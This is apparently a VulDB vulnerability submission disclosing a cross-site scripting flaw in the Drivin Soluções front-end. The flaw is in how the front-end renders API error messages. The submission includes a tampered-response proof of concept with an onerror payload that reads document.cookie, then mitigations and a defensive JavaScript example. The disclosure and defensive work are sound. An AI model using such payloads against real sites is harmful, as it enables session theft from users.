Submission #509834: Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation

Information

Title: Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation

Description:

Vendor: Drivin
Product: Drivin Soluções

A Cross-Site Scripting (XSS) vulnerability was identified in the Drivin Soluções platform. The front-end takes the `message` field of JSON error responses from the API and inserts it into the page as HTML without output encoding, so any markup in that field is parsed and executed by the browser.

Request:

    POST /api/school/registerSchool HTTP/2
    Host: X.X.X.X
    Content-Type: application/json

    {"name":"bilubiluteteia","code":"123","cnpj":"12.321.321/3213-21","email":"[email protected]","phone":"(12) 3 1231-2312","zipCode":"18053-362","city":"Sorocaba","street":"Rua Almir Muza Soares","district":"Jardim Santa Bárbara","number":"123123","complement":"","state":"SP"}

Response:

    HTTP/2 400 Bad Request
    Content-Type: application/json

    {"message":"Escola ja cadastrada!","error":"Escola ja cadastrada!","statusCode":400}

("Escola ja cadastrada!" is Portuguese for "School already registered!")

POC
----------------
By intercepting the API response in a proxy and modifying the `message` field, a tester can inject markup that the front-end renders as HTML. Tampered response:

    HTTP/2 400 Bad Request
    Content-Type: application/json

    {"message":"<img src onerror=alert(document.cookie)>","error":"Escola ja cadastrada!","statusCode":400}

When the front-end renders this response, the `onerror` handler inside the `message` field executes in the context of the page.

Note on exploitability: as written, the PoC modifies the response in the tester's own intercepting proxy, so the payload only runs in the tester's own browser (self-XSS). For the script to run for another user, an attacker must be able to control what the API places in `message` (for example server-side input echoed back in the error text, which this report does not demonstrate) or must be positioned to tamper with the victim's traffic. What the PoC does establish is the client-side defect: the front-end trusts API response text and renders it as HTML.

Impact:
- Theft of authentication cookies and session hijacking.
- Potential redirection to malicious websites.
- Defacement or unauthorized actions performed on behalf of the victim.

Mitigation:
- Apply output encoding (or assign the text via textContent rather than innerHTML) before displaying any data that did not originate in the page's own code, including API error messages.
- Use a Content Security Policy (CSP) without 'unsafe-inline' to block inline event handlers such as the `onerror` used here.
- Validate API responses (expected type and length of each field) before rendering them in the front-end.

Classification:
- Type: Reflected XSS via API Response Manipulation
- CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
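The following is an added example, not the reporter's code and not Drivin's front-end. It contrasts the unsafe pattern the report implies (API error text assigned through innerHTML) with a hardened error handler and an encoder for the cases where markup has to be built as a string. The element and function names are assumptions; plain objects stand in for DOM elements so the code runs under Node.js and the innerHTML/textContent assignments can be inspected. The two response bodies are the ones quoted in the report, embedded as constructed sample input.

```javascript
// Added example, not the reporter's code or Drivin's front-end. Element and
// function names are assumptions; plain objects stand in for DOM elements so
// this runs under Node.js without a browser.

// Constructed samples: the legitimate and the tampered 400 response bodies
// quoted in the report, as the bytes the browser would receive.
const LEGIT_BODY =
  '{"message":"Escola ja cadastrada!","error":"Escola ja cadastrada!","statusCode":400}';
const TAMPERED_BODY =
  '{"message":"<img src onerror=alert(document.cookie)>",' +
  '"error":"Escola ja cadastrada!","statusCode":400}';

// Vulnerable pattern: the message is interpolated into markup and assigned to
// innerHTML, so the browser parses it as HTML and fires the onerror handler.
function showErrorUnsafe(el, body) {
  const data = JSON.parse(body);
  el.innerHTML = `<p class="error">${data.message}</p>`;
  return el.innerHTML;
}

// Hardened pattern: parse defensively, require the field to be a short string,
// and assign it with textContent so it is displayed as text, never parsed as HTML.
function showErrorSafe(el, body) {
  let data;
  try {
    data = JSON.parse(body);
  } catch {
    data = {};
  }
  const msg = typeof data.message === 'string' && data.message.length <= 500
    ? data.message
    : 'Request failed';
  el.textContent = msg;
  return el.textContent;
}

// When markup must be built as a string (template helpers, server-side
// rendering), encode for the HTML text context before interpolating.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderErrorMarkup(body) {
  let data;
  try {
    data = JSON.parse(body);
  } catch {
    data = {};
  }
  const msg = typeof data.message === 'string' ? data.message : 'Request failed';
  return `<p class="error">${escapeHtml(msg)}</p>`;
}

// Check usable in a unit test: does the rendered output still contain an
// element tag apart from the wrapper <p>?
function leaksMarkup(html) {
  const inner = html.replace(/^<p class="error">/, '').replace(/<\/p>$/, '');
  return /<\/?[a-zA-Z]/.test(inner);
}

// Demo: the unsafe handler leaks the injected tag, the hardened ones do not.
console.log('unsafe innerHTML :', showErrorUnsafe({}, TAMPERED_BODY));
console.log('safe textContent :', showErrorSafe({}, TAMPERED_BODY));
console.log('escaped markup   :', renderErrorMarkup(TAMPERED_BODY));
console.log('leaks? unsafe =', leaksMarkup(showErrorUnsafe({}, TAMPERED_BODY)),
            ' hardened =', leaksMarkup(renderErrorMarkup(TAMPERED_BODY)));
```

The textContent assignment is the fix the report's mitigation calls for; most front-end frameworks do the same by default and only reintroduce the problem through explicit raw-HTML bindings such as `innerHTML` or `dangerouslySetInnerHTML`. As a second layer, a response header such as `Content-Security-Policy: script-src 'self'` (no 'unsafe-inline') makes the browser refuse to run the inline `onerror` handler even where encoding was missed.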
Source: https://github.com/yago3008/cves
User: y4g0 (UID 80480)
Submitted: 26/02/2025 07:52 PM (1 year ago)
Moderation: 15/03/2025 10:27 AM (17 days later)
Status: Approved
VulDB Entry: 299800 [Drivin Soluções up to 20250226 API registerSchool message cross site scripting]
Points: 20
